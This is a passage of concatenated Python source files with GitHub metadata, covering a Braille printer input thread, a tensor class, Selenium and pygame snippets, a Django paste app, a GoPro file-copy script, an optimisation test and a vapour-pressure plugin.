\"KEYBOARD\":\n                self.inputlogFile.write(\"Reading Input from Keyboard\\n\")\n                self.inputlogFile.write(\"------------------------------\\n\")\n                print(\"\\nKeyboard connected for input: type to print to the Curtin University Brailler\")\n                print(\"To Exit, press ESC, CTRL-C or CTRL-Z\")\n                print(\"-----------------------------------------------------------------------------\")\n                tty.setraw(self.f_stdin)\n            elif self.mode == \"FILE\":\n                self.inputlogFile.write(f\"Reading Input from File: {self.inFilename}\\n\")\n                self.inputlogFile.write(\"------------------------------\\n\")\n                print(f\"Translating and outputting from file: {self.inFilename}\")\n                print(\"Printing\", end='')\n                sys.stdout.flush()\n\n            logging.info(\"Starting Input Loop\")\n\n        # Loop until exit flag is set\n        while not self.exit:\n            # Get input as a list of characters in braille cell notation\n            in_chars = self.__take_input()\n            logging.info(f\"Input from {self.mode} is: {in_chars}\")\n\n            if in_chars[0] == \"END OF INPUT\":\n                # Close Input, outputs end of input at close\n                self.exit = True\n            else:\n                # Output each character to the Control System\n                for char in in_chars:\n                    self.__output_cub(char)\n\n            # Pause if flag is not set\n            self.runFlag.wait()\n\n    def __take_input(self):\n        \"\"\"Takes the next input from the current input mode and returns it translated into CUB Braille Format\n\n        :return: list of characters in CUB Braille format\n        \"\"\"\n        # Setup return list\n        # Note: Must be list as calls to translate can convert a single character into\n        # multiple braille characters i.e. capital A is capital prefix followed by a\n        chars = []\n\n        # ---------\n        # Keyboard\n        # ---------\n        if self.mode == \"KEYBOARD\":\n            # Read input from keyboard via stdin\n            char_raw = sys.stdin.read(1)\n            # Write the input character to log file\n            self.inputlogFile.write(char_raw)\n            logging.debug(f\"Input retrieved from Keyboard as : {char_raw}\")\n\n            if char_raw == '\\x03' or char_raw == '\\x1a' or char_raw == '^C' or char_raw == '^Z' or char_raw == '\\x1b':\n                # The input key was an exit key/combination\n                logging.info(\"Keyboard triggered Shutdown\")\n                raise CUBClose(\"Keyboard Input\", \"Keyboard Interrupt received\")\n            # Translate the input into CUB Braille format (Language set for English keyboard)\n            chars = translate(char_raw, \"ENG\")\n            self.__log_input(chars)\n\n        # -----------------\n        # Braille Keyboard\n        # -----------------\n        elif self.mode == \"BKEYBOARD\":\n            # Retrieve input from the braille keyboard pipe\n            msg = self.__input_b_keyboard()\n            logging.debug(f\"Input retrieved from Braille Keyboard as : {msg}\")\n            if msg == \"END OF INPUT\":\n                # Input signals end of input\n                chars = [msg]\n                logging.info(\"Input Finished while reading\")\n            else:\n                self.inputlogFile.write(msg)\n                # Translate the input to CUB Braille format\n                chars = translate(msg, \"BKB\")\n                self.__log_input(chars)\n\n        # -----------\n        # File Input\n        # -----------\n        elif self.mode == \"FILE\":\n            line = self.inFile.readline()\n            logging.debug(f\"Input retrieved from File as : {line}\")\n            if line == \"\":\n                # Input signals end of input\n                chars = [\"END OF INPUT\"]\n                logging.info(\"Input Finished while reading\")\n            else:\n                self.inputlogFile.write(line)\n                # Translate the input to CUB Braille format, grade two for full contractions\n                chars = translate(line, self.inFileLang, grade=2)\n                self.__log_input(chars)\n\n        return chars\n\n    def __log_input(self, chars):\n        \"\"\"Logs the translated input characters into the translation log file\n\n        :param chars: Input characters to be logged\n        :return: None\n        \"\"\"\n        # Write all translated characters to the log file\n        for character in chars:\n            self.translationlogFile.write(character + \" \")\n\n    def pause_input(self):\n        \"\"\"Sets the run Flag to false to pause the operation of the Input thread\n\n        :return: None\n        \"\"\"\n        self.runFlag.clear()\n\n    def start_input(self):\n        \"\"\"Sets the run Flag to true to enable the operation of the Input thread\n\n        :return: None\n        \"\"\"\n        self.runFlag.set()\n\n    def close(self):\n        \"\"\"Sets the exit flag to true to signal for the Input thread to close\n\n        :return: None\n        \"\"\"\n        self.exit = True\n        self.runFlag.set()\n\n    def __output_cub(self, msg):\n        \"\"\"Places the argument object into the output pipe to be received by another thread\n\n        :param msg: Message to be output to another thread\n        :return: None\n        \"\"\"\n        logging.debug(f\"CUBInput Sent message to CUB - {msg}\")\n        self.input_pipe_cub.send(msg)\n\n    def __input_cub(self):\n        \"\"\"Returns the next message in the input pipe to be received from another thread\n\n        :return: The object received from another thread\n        \"\"\"\n        msg = self.input_pipe_cub.recv()\n        logging.debug(f\" CUBInput Received message from CUB - {msg}\")\n        return msg\n\n    def send(self, msg):\n        \"\"\"Used by other threads to send a message to the input thread\n\n        :param msg: Message to be input to the Input thread\n        :return: None\n        \"\"\"\n        self.cub_pipe.send(msg)\n\n    def recv(self):\n        \"\"\"Used by other threads to receive a message from the input thread\n\n        :return: Message output by the Input thread\n        \"\"\"\n        msg = self.cub_pipe.recv()\n        logging.debug(f\"Cub received message from input - {msg}\")\n\n        # Print to screen as progress indicator of file printing\n        if self.mode == \"FILE\":\n            print(\".\", end='')\n            sys.stdout.flush()\n\n        return msg\n\n    def __input_b_keyboard(self):\n        \"\"\"Returns the next message in the Braille Keyboard pipe to be received from the Braille Keyboard process\n\n        :return: The object received from the Braille Keyboard process\n        \"\"\"\n        return self.input_pipe_BKeyboard.recv()\n\n    def __output_b_keyboard(self, msg):\n        \"\"\"Places the argument object into the Braille Keyboard pipe to be received by the Braille Keyboard process\n\n        :param msg: Message to be sent to the Braille Keyboard process\n        :return: None\n        \"\"\"\n        self.input_pipe_BKeyboard.send(msg)\n","repo_name":"Chertan/CUB_Control_Software","sub_path":"component_control/Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":15381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10013334840","text":"import cgpt\nimport gpt\nimport numpy as np\nfrom gpt.core.foundation import tensor as foundation, base as foundation_base\n\n\nclass tensor(foundation_base):\n    foundation = foundation\n\n    def
__init__(self, first, second=None):\n if second is not None:\n array, otype = first, second\n else:\n otype = first\n array = np.zeros(otype.shape, dtype=np.complex128)\n\n # allow to match compatible shapes\n if array.shape != otype.shape:\n array = np.reshape(array, otype.shape)\n\n self.array = np.ascontiguousarray(array)\n self.otype = otype\n assert self.array.shape == otype.shape\n\n def __repr__(self):\n return \"tensor(%s,%s)\" % (str(self.array), self.otype.__name__)\n\n def __getitem__(self, a):\n return self.array.__getitem__(a)\n\n def __setitem__(self, a, b):\n return self.array.__setitem__(a, b)\n\n def nfloats(self):\n return self.otype.nfloats\n\n def transposable(self):\n return self.otype.transposed is not None\n\n def transpose(self):\n if not self.transposable():\n return gpt.transpose(gpt.expr(self))\n return tensor(np.transpose(self.array, self.otype.transposed), self.otype)\n\n def conj(self):\n return tensor(self.array.conj(), self.otype)\n\n def copy(self):\n return tensor(np.copy(self.array), self.otype)\n\n def new(self):\n return tensor(np.zeros(shape=self.array.shape, dtype=self.array.dtype), self.otype)\n\n def adj(self):\n if not self.transposable():\n return gpt.adj(gpt.expr(self))\n return tensor(np.transpose(self.array.conj(), self.otype.transposed), self.otype)\n\n def reduced(self):\n if self.otype.data_otype() == gpt.ot_singlet:\n return complex(self.array)\n return self\n\n def trace(self, t):\n res = self\n if t & gpt.expr_unary.BIT_SPINTRACE:\n st = res.otype.spintrace\n assert st is not None and len(st) == 3 # do not yet support tracing vectors\n if st[0] is not None:\n res = tensor(np.trace(res.array, offset=0, axis1=st[0], axis2=st[1]), st[2]())\n if t & gpt.expr_unary.BIT_COLORTRACE:\n ct = res.otype.colortrace\n assert ct is not None and len(ct) == 3\n if ct[0] is not None:\n res = tensor(np.trace(res.array, offset=0, axis1=ct[0], axis2=ct[1]), ct[2]())\n\n if res.otype == gpt.ot_singlet:\n res = complex(res.array)\n return res\n\n def norm2(self):\n return np.linalg.norm(self.array) ** 2.0\n\n def __mul__(self, other):\n if isinstance(other, gpt.tensor):\n self_tag = self.otype.__name__\n other_tag = other.otype.__name__\n if other_tag in self.otype.mtab:\n mt = self.otype.mtab[other_tag]\n elif self_tag in other.otype.rmtab:\n mt = other.otype.rmtab[self_tag]\n a = np.tensordot(self.array, other.array, axes=mt[1])\n if len(mt) > 2:\n a = np.transpose(a, mt[2])\n return tensor(a, mt[0]())\n elif gpt.util.is_num(other):\n return tensor(self.array * complex(other), self.otype)\n elif isinstance(other, gpt.expr) and other.is_single(gpt.tensor):\n ue, uf, to = other.get_single()\n if ue == 0 and uf & gpt.factor_unary.BIT_TRANS != 0:\n tag = to.otype.__name__\n assert tag in self.otype.otab\n mt = self.otype.otab[tag]\n rhs = to.array\n if uf & gpt.factor_unary.BIT_CONJ != 0:\n rhs = rhs.conj()\n x = np.multiply.outer(self.array, rhs)\n for swp in mt[1]:\n x = np.swapaxes(x, swp[0], swp[1])\n return tensor(x, mt[0]())\n assert 0\n else:\n return other.__rmul__(self)\n\n def __rmul__(self, other):\n if gpt.util.is_num(other):\n return tensor(self.array * other, self.otype)\n else:\n return other.__mul__(self)\n\n def __add__(self, other):\n assert self.otype.__name__ == other.otype.__name__\n return tensor(self.array + other.array, self.otype)\n\n def __truediv__(self, other):\n return tensor(self.array / other, self.otype)\n\n def __neg__(self):\n return tensor(-self.array, self.otype)\n\n def __sub__(self, other):\n assert self.otype.__name__ == 
other.otype.__name__\n        return tensor(self.array - other.array, self.otype)\n\n    def __iadd__(self, other):\n        assert self.otype.__name__ == other.otype.__name__\n        self.array += other.array\n        return self\n\n    def __isub__(self, other):\n        assert self.otype.__name__ == other.otype.__name__\n        self.array -= other.array\n        return self\n\n    def __itruediv__(self, other):\n        self.array /= other\n        return self\n\n    def __imatmul__(self, other):\n        assert self.otype.__name__ == other.otype.__name__\n        self.array = other.array.copy()\n        return self\n","repo_name":"lehner/gpt","sub_path":"lib/gpt/core/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"38"} +{"seq_id":"1875899290","text":"def print_urls(urls_list, file):\n    with open(file, 'w') as File:\n        for url in urls_list:\n            print(url, file=File)\n\ndef id_to_url(file):\n    with open(file, 'r') as url_file:\n        content = url_file.read()\n    ids = content.split('\\n')\n    ids = list(filter(None, ids))\n    url_format = \"https://www.leboncoin.fr/colocations/{}.htm/\"\n    urls_list = [url_format.format(id_elem) for id_elem in ids]\n    return urls_list\n\n\ndef print_links(link_list, file):\n    id_list = []\n    for link in link_list:\n        link_id = link.split('/')[-2]\n        link_id = link_id.replace('.htm', '')\n        id_list.append(link_id)\n\n    id_list = [int(id_x) for id_x in id_list]\n    id_list.sort()\n    new_file = open(file, \"w\")\n    for id_elem in id_list:\n        print(id_elem, file=new_file)\n    new_file.close()\n","repo_name":"AbcSxyZ/GetHome-Leboncoin","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37082431087","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nimport os \n\n\ntry: \n    # give the browser the link\n    link = \"http://suninjuly.github.io/file_input.html\"\n    browser = webdriver.Chrome()\n    browser.get(link)\n    \n    # fill in the fields\n    first_name = browser.find_element(By.NAME, 'firstname')\n    first_name.send_keys(\"Name\")\n\n    second_name = browser.find_element(By.NAME, 'lastname')\n    second_name.send_keys(\"LastName\")\n    \n    male = browser.find_element(By.NAME, 'email')\n    male.send_keys(\"qq@qq.ru\")\n    \n    # add the file\n    current_dir = os.path.abspath(os.path.dirname(__file__)) # get the path to the directory of the currently executing file \n    file_path = os.path.join(current_dir, 'text.txt') # append the file name to this path \n    element = browser.find_element(By.ID, 'file') # set a variable for the file input, i.e. the control the file will be added to\n    element.send_keys(file_path)\n    \n    # Submit button (compound class names are not valid with By.CLASS_NAME, so use a CSS selector)\n    button = browser.find_element(By.CSS_SELECTOR, '.btn.btn-primary')\n    button.click()\n    \n    # wait for the page to load\n    time.sleep(1)\n    \n\nfinally:\n    # wait so the script results can be checked visually\n    time.sleep(10)\n    # close the browser after all the steps\n    browser.quit()","repo_name":"DenisKoptelov/stepik_auto_tests_course","sub_path":"block2_lesson2_step7.py","file_name":"block2_lesson2_step7.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12201227507","text":"import sys\n\nimport pygame\nfrom OpenGL.GL import *\n\nclass ToolBox:\n    toolbox = 0\n\n    def __init__(self):\n        self.toolbox = 1\n\n    def loadTexture(self, image):\n        textureSurface = pygame.image.load(image)\n        
textureSurface = pygame.transform.flip(textureSurface, False, True)\n textureData = pygame.image.tostring(textureSurface, \"RGBA\", 1)\n width = textureSurface.get_width()\n height = textureSurface.get_height()\n\n glEnable(GL_TEXTURE_2D)\n texid = glGenTextures(1)\n\n glBindTexture(GL_TEXTURE_2D, texid)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, width, height, 0, GL_RGBA, GL_UNSIGNED_BYTE, textureData)\n\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n\n return texid","repo_name":"Chubek/NegarinRuyeh","sub_path":"NegToolBox.py","file_name":"NegToolBox.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35177179405","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import PasteText\n\n@login_required(login_url='/login/')\ndef paster(request):\n entries = PasteText.objects.order_by('-created')\n return render(request, 'paster/paster.html', {'entries' : entries})\n\n@csrf_exempt\ndef post_text(request):\n text = request.POST.get('to_save', None)\n created = PasteText.objects.create(text=text)\n data = {\n 'saved_text': created.text,\n 'saved_id' : created.id\n }\n return JsonResponse(data)\n\n@csrf_exempt\ndef delete_text(request):\n id = request.POST.get('to_delete', None)\n ret = PasteText.objects.get(id=id).delete()\n if ret[0] == 1:\n data = {'was_success': \"true\"}\n else:\n data = {'was_success': \"false\"}\n return JsonResponse(data)","repo_name":"pgilfillan/personal_site","sub_path":"paster/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11069342755","text":"'''\nCreated on Aug 24, 2023\n\n@author: dan\n'''\n\nfrom argparse import ArgumentParser\nimport pathlib\nimport os\nimport re\nimport shutil\n\n# GPVideo should just hold the full path filenames. \n\nclass GPVideo:\n def __init__(self, videonumber, filenames=None):\n self.video_number = videonumber\n if not filenames:\n self.filenames = list()\n else:\n self.filenames = filenames\n def __lt__(self, num):\n return self.video_number < num\n def __str__(self):\n return \"%s: %s\" % (self.video_number, self.filenames)\n def add_video(self, filename):\n self.filenames.append(filename)\n\nclass GPVideoFolder:\n def __init__(self, folder, d=None):\n base_folder = pathlib.Path(folder)\n if not base_folder.is_dir():\n raise RuntimeError(\"base folder %s not found!\" % (folder))\n self.vdict = dict()\n if not d:\n # if no dict provided, then this should be a folder containing videos \n # as copied from the camera's SD card. \n \n # regex to see filename pattern that the GOPRO uses.\n # First capture group is the sequence number, second is the video id.\n video_name_pattern = re.compile('^GH([0-9]{2})([0-9]{4}).MP4$')\n \n # scan source folder. Create new GPVideo if needed. 
Add video \n            # files as they come up.\n            obj = os.scandir(folder)\n            for entry in obj:\n                if entry.is_file():\n                    m = video_name_pattern.match(entry.name)\n                    if m is not None:\n                        movie_id = m.groups()[1]\n                        movie_seq = m.groups()[0]\n                        if movie_id not in self.vdict:\n                            self.vdict[movie_id] = GPVideo(movie_id)\n                        self.vdict[movie_id].add_video(str(base_folder.joinpath(entry.name)))\n            \n            for v in self.vdict.values():\n                v.filenames.sort()\n        else:\n            for k, v in d.items():\n                self.vdict[k] = GPVideo(k, v)            \n        \n    def all_filenames(self):\n        '''\n        Returns a list of all video file paths (full path, as strings) in this folder. \n        '''\n        l = list()\n        for gpv in self.vdict.values():\n            for f in gpv.filenames:\n                l.append(f)\n        return l\n    def all_gpvideos(self):\n        '''\n        Returns list of GPVideo\n        '''\n        return self.vdict.values()        \n    def copy_and_delete(self, dest, doDelete=True):\n        '''\n        Copy all video files in this folder to the folder in dest, optionally deleting each file from the source folder after a verified copy.\n        :param dest: (string) destination folder for files.\n        :param doDelete: (bool) if True (the default), delete each source file once its copy is verified.\n        '''\n        destination_folder = pathlib.Path(dest)\n        if not destination_folder.is_dir():\n            raise RuntimeError(\"destination video folder %s not found!\" % (dest))\n        for filename in self.all_filenames():\n            print(\"Copying %s to %s...\" % (filename, str(destination_folder)))\n            shutil.copy(filename, destination_folder)\n            \n            # grok the destination filename\n            pathFilename = pathlib.Path(filename)\n            pathDestinationFile = destination_folder.joinpath(pathFilename.name)\n            if pathFilename.stat().st_size == pathDestinationFile.stat().st_size :\n                if doDelete:\n                    pathFilename.unlink()\n                    print(f\"Removed {str(filename)}\")\n                else:\n                    print(f\"Source file {str(filename)} not deleted.\")\n            else: \n                raise RuntimeError(\"Incomplete file copy for %s, src/dest size %d/%d\" % (filename, pathFilename.stat().st_size, pathDestinationFile.stat().st_size))\n\nif __name__ == '__main__': \n    parser = ArgumentParser()\n    parser.add_argument(\"-s\", \"--source-folder\", required=True, help=\"folder containing (source) movie files\")\n    parser.add_argument(\"-d\", \"--dest-folder\", required=True, help='destination folder for file operations (copy, compress)')\n    parser.add_argument(\"-n\", \"--no-delete\", required=False, default=False, action='store_true', help=\"If set, do not delete files from source location after copy\")\n    args = parser.parse_args()\n    argsdict = vars(args)\n    \n    #vdict=GPVideoFolder('/Users/dan/workspace-python/gpcopy/testsrc')\n    videos=GPVideoFolder(argsdict['source_folder'])\n    videos.copy_and_delete(argsdict['dest_folder'], not argsdict['no_delete'])\n\n    ","repo_name":"djsperka/box-upload-tool","sub_path":"test-flask/video_files.py","file_name":"video_files.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73499838189","text":"import sys\nimport tensorflow as tf\nimport numpy as np\nfrom grad_constr import lagrange_objective, lagrange_objective2, constrained_gradient_descent, newton_solver, flatify, total_loss\n\n# test\nmod = sys.argv[1]\n\n# algorithm params\nmaxiter = 20000\nstep = 0.2\nlrate = 0.1\ntol = 1.0e-7\nper = 100\n\n##\n## algebraic system\n##\n\nif mod == 'algebraic':\n    # init\n    x0 = 0.1\n    y0 = -0.2\n    z0 = 0.3\n\n    # vars\n    x = tf.Variable(3*[x0])\n    y = tf.Variable(3*[y0])\n    z = tf.Variable(3*[z0])\n\n    # cons\n    c1 = 1.0 - (x-0.5)**2 - (y+0.5)**2 - z**2\n    c2 = 1.0 - (x+0.5)**2 - (y-0.5)**2 - z**2\n\n    # output\n    obj = -tf.reduce_mean(x+y+z)\n    con = [c1, c2]\n    var = [x, y, z]\n\n##\n## 
growth Model\n##\n\nif mod == 'growth':\n # params\n rho = tf.Variable(0.05)\n lam = tf.Variable(0.2)\n c = tf.Variable(1.5)\n\n # eq vars\n wt = tf.Variable(0.9)\n vt = tf.Variable(1.1)\n tau = tf.Variable(0.12)\n P = tf.Variable(0.8)\n R = tf.Variable(0.2)\n\n # inter\n pit = lam/(1.0+lam)\n\n # cons\n lmc = P + R - 1.0\n val = (rho+tau)*vt - pit\n ent = wt*c - vt\n lab = (1.0+lam)*wt*P - 1.0\n res = R - tau*c\n\n # moments\n rnd = c*tau\n grw = tf.log(1.0+lam)*tau\n prf = pit\n mmt_gen = [rnd, grw, prf]\n mmt_dat = [0.18, 0.022, 0.17]\n mmt = [g - d for g, d in zip(mmt_gen, mmt_dat)]\n\n # output\n obj = total_loss(mmt)\n con = [lmc, val, ent, lab, res]\n var = [rho, lam, c, wt, vt, tau, P, R]\n\n# update\n# newt = newton_solver(con, var)\n\nlobj, mult, lgrd_varz, lgrd_mult = lagrange_objective(obj, con, var)\ncgd = tf.train.GradientDescentOptimizer(learning_rate=lrate)\nmini = cgd.minimize(lobj, var_list=var+mult)\n\n# lobj = lagrange_objective2(obj, con, 5.0)\n# cgd = tf.train.GradientDescentOptimizer(learning_rate=lrate)\n# mini = cgd.minimize(lobj, var_list=var)\n\n# constraint error\ncvec = flatify(con)\ncerr = total_loss(con)\n\n# output\ndef status(i):\n print(f'{i:4d}: {obj.eval():10g} {cerr.eval():10g}')\n\nsess = tf.InteractiveSession()\n\nprint('initializing')\nsess.run(tf.global_variables_initializer())\nstatus(0)\n\n# print('solving')\n# for i in range(maxiter):\n# newt.run()\n# status(i)\n# if cerr.eval() < tol:\n# print('solved')\n# break\n\nprint('optimizing')\nlast_obj = np.inf\nfor i in range(maxiter):\n if i % per == 0:\n status(i)\n\n mini.run()\n\n next_obj = obj.eval()\n diff_obj = next_obj - last_obj\n last_obj = next_obj\n\n err = cerr.eval()\n\n if np.abs(next_obj) < tol and err < tol:\n print('optimized')\n status(i)\n break\n\n if np.isnan(next_obj) or np.isnan(err):\n print('failed')\n status(i)\n break\n","repo_name":"iamlemec/meteo","sub_path":"test_grad_constr.py","file_name":"test_grad_constr.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"6090696204","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport logging\n\nimport fstpy\nimport numpy as np\nimport pandas as pd\n\nfrom ..humidityutils.humidityutils import (get_temp_phase_switch,\n validate_humidity_parameters, \n mandatory_ice_water_phase_when_using_temp_phase_switch)\nfrom ..plugin import Plugin, PluginParser\nfrom ..science import (TDPACK_OFFSET_FIX, rpn_vppr_from_hu, rpn_vppr_from_td,\n vppr_from_hr, vppr_from_hu, vppr_from_qv, vppr_from_td)\nfrom ..utils import (create_empty_result, existing_results, \n get_dependencies, get_existing_result, get_from_dataframe,\n initializer, explicit_params_checker, DependencyError)\nfrom ..configparsingutils import check_and_format_humidity_parsed_arguments\n\n\nclass VapourPressureError(Exception):\n pass\n\n\nclass VapourPressure(Plugin):\n \"\"\"Calculates the vapour pressure of water\n\n :param df: input DataFrame\n :type df: pd.DataFrame\n :param ice_water_phase: Switch to determine which phase to consider: ice and water ('both'), or, water only ('water'), defaults to 'both'\n :type ice_water_phase: str, optional\n :param temp_phase_switch: Temperature at which to change from the ice phase to the water phase, defaults to '-40'\n :type temp_phase_switch: float, optional\n :param temp_phase_switch_unit: Temperature phase switch unit, defaults to 'celsius'\n :type temp_phase_switch_unit: str, optional\n :param rpn: Use rpn library algorithm, 
defaults to False\n :type rpn: bool, optional\n :param dependency_check: Indicates the plugin is being called from another one who checks dependencies , defaults to False\n :type dependency_check: bool, optional \n :param copy_input: Indicates that the input fields will be returned with the plugin results , defaults to False\n :type copy_input: bool, optional \n \"\"\"\n computable_plugin = \"VPPR\"\n @explicit_params_checker\n @initializer\n def __init__(\n self,\n df: pd.DataFrame,\n ice_water_phase='both',\n temp_phase_switch=-40,\n temp_phase_switch_unit='celsius',\n rpn=False,\n dependency_check=False,\n copy_input=False):\n\n self.plugin_params = {\n 'ice_water_phase': self.ice_water_phase,\n 'temp_phase_switch': self.temp_phase_switch,\n 'temp_phase_switch_unit': self.temp_phase_switch_unit,\n 'rpn': self.rpn}\n\n self.plugin_mandatory_dependencies_rpn = [\n # HU + PXpa\n {\n 'HU': {'nomvar': 'HU', 'unit': 'kilogram_per_kilogram', 'select_only': True},\n 'PX': {'nomvar': 'PX', 'unit': 'pascal'}\n },\n # QVkg + PX\n {\n 'QV': {'nomvar': 'QV', 'unit': 'kilogram_per_kilogram', 'select_only': True},\n 'PX': {'nomvar': 'PX', 'unit': 'hectoPascal'}\n },\n #TT + HR + PX > HUrpn + PXpa\n {\n 'TT': {'nomvar': 'TT', 'unit': 'kelvin'},\n 'HR': {'nomvar': 'HR', 'unit': 'scalar', 'select_only': True},\n 'PX': {'nomvar': 'PX', 'unit': 'hectoPascal'}\n },\n # ES + TTk\n {\n 'TT': {'nomvar': 'TT', 'unit': 'kelvin'},\n 'ES': {'nomvar': 'ES', 'unit': 'kelvin', 'select_only': True},\n },\n # TDk + TTk\n {\n 'TT': {'nomvar': 'TT', 'unit': 'kelvin'},\n 'TD': {'nomvar': 'TD', 'unit': 'kelvin', 'select_only': True},\n }\n ]\n self.plugin_mandatory_dependencies = [\n # HU + PX\n {\n 'HU': {'nomvar': 'HU', 'unit': 'kilogram_per_kilogram', 'select_only': True},\n 'PX': {'nomvar': 'PX', 'unit': 'hectoPascal'}\n },\n # QVkg/kg + PX\n {\n 'QV': {'nomvar': 'QV', 'unit': 'kilogram_per_kilogram', 'select_only': True},\n 'PX': {'nomvar': 'PX', 'unit': 'hectoPascal'}\n },\n # HR + SVP\n {\n 'HR': {'nomvar': 'HR', 'unit': 'scalar', 'select_only': True},\n 'SVP': {'nomvar': 'SVP', 'unit': 'hectoPascal'},\n },\n # ES + TT\n {\n 'TT': {'nomvar': 'TT', 'unit': 'celsius'},\n 'ES': {'nomvar': 'ES', 'unit': 'celsius', 'select_only': True},\n },\n # TD + TT\n {\n 'TT': {'nomvar': 'TT', 'unit': 'celsius'},\n 'TD': {'nomvar': 'TD', 'unit': 'celsius', 'select_only': True},\n }\n ]\n\n self.plugin_result_specifications = {\n 'VPPR': {\n 'nomvar': 'VPPR',\n 'etiket': 'VAPRES',\n 'unit' : 'hectoPascal',\n 'nbits' : 16,\n 'datyp' : 1}}\n\n\n self.df = fstpy.metadata_cleanup(self.df)\n super().__init__(df)\n self.prepare_groups()\n\n def prepare_groups(self):\n self.no_meta_df = fstpy.add_columns(\n self.no_meta_df, columns=['unit', 'forecast_hour', 'ip_info'])\n\n mandatory_ice_water_phase_when_using_temp_phase_switch(\n VapourPressureError,\n self.explicit_params)\n\n validate_humidity_parameters(\n VapourPressureError,\n self.ice_water_phase,\n self.temp_phase_switch,\n self.temp_phase_switch_unit,\n explicit_temp_phase_switch = (\"temp_phase_switch\" in self.explicit_params),\n rpn=self.rpn)\n\n self.temp_phase_switch = get_temp_phase_switch(\n VapourPressureError,\n self.ice_water_phase == 'both',\n self.temp_phase_switch,\n self.temp_phase_switch_unit,\n self.rpn)\n\n # check if result already exists\n self.existing_result_df = get_existing_result(\n self.no_meta_df, self.plugin_result_specifications)\n self.groups = self.no_meta_df.groupby(\n ['grid', 'datev', 'ip1_kind'])\n\n\n def compute(self) -> pd.DataFrame:\n if not 
self.existing_result_df.empty:\n return existing_results(\n 'VapourPressure',\n self.existing_result_df,\n self.meta_df)\n\n logging.info('VapourPressure - compute')\n df_list = []\n try:\n if self.rpn:\n dependencies_list = get_dependencies(\n self.groups,\n self.meta_df,\n 'VapourPressure',\n self.plugin_mandatory_dependencies_rpn,\n self.plugin_params,\n intersect_levels=True,\n dependency_check = self.dependency_check)\n else:\n dependencies_list = get_dependencies(\n self.groups,\n self.meta_df,\n 'VapourPressure',\n self.plugin_mandatory_dependencies,\n self.plugin_params,\n intersect_levels=True,\n dependency_check = self.dependency_check)\n except DependencyError:\n if not self.dependency_check:\n raise DependencyError(f'{VapourPressure} - No matching dependencies found')\n else:\n for dependencies_df, option in dependencies_list:\n if self.rpn:\n if option == 0:\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies_rpn[option])\n hu_df = get_from_dataframe(dependencies_df, 'HU')\n vppr_df = self.rpn_vapourpressure_from_hu_px(\n hu_df, dependencies_df, option)\n\n elif option == 1:\n vppr_df = self.vapourpressure_from_qv_px(\n dependencies_df, option, True)\n\n elif option == 2:\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies_rpn[option])\n hu_df = self.compute_hu(dependencies_df)\n vppr_df = self.rpn_vapourpressure_from_hu_px(\n hu_df, dependencies_df, option)\n\n elif option == 3:\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies_rpn[option])\n td_df = self.compute_td(dependencies_df)\n vppr_df = self.rpn_vapourpressure_from_tt_td(\n td_df, dependencies_df, option)\n\n else:\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies_rpn[option])\n td_df = get_from_dataframe(dependencies_df, 'TD')\n vppr_df = self.rpn_vapourpressure_from_tt_td(\n td_df, dependencies_df, option)\n\n else:\n if option == 0:\n vppr_df = self.vapourpressure_from_hu_px(\n dependencies_df, option)\n\n elif option == 1:\n vppr_df = self.vapourpressure_from_qv_px(\n dependencies_df, option)\n\n elif option == 2:\n vppr_df = self.vapourpressure_from_hr_svp(\n dependencies_df, option)\n\n elif option == 3:\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies[option])\n td_df = self.compute_td(dependencies_df)\n vppr_df = self.vapourpressure_from_tt_td(\n td_df, dependencies_df, option)\n\n else:\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies[option])\n td_df = get_from_dataframe(dependencies_df, 'TD')\n vppr_df = self.vapourpressure_from_tt_td(\n td_df, dependencies_df, option)\n\n df_list.append(vppr_df)\n finally:\n return self.final_results(df_list, VapourPressureError, \n dependency_check = self.dependency_check, \n copy_input = self.copy_input)\n\n def vapourpressure_from_hu_px(self, dependencies_df, option):\n logging.info(f'VapourPressure - option {option+1}')\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies[option])\n hu_df = get_from_dataframe(dependencies_df, 'HU')\n\n px_df = get_from_dataframe(dependencies_df, 'PX')\n vppr_df = create_empty_result(\n hu_df, self.plugin_result_specifications['VPPR'], all_rows=True)\n for i in vppr_df.index:\n hu = hu_df.at[i, 'd']\n 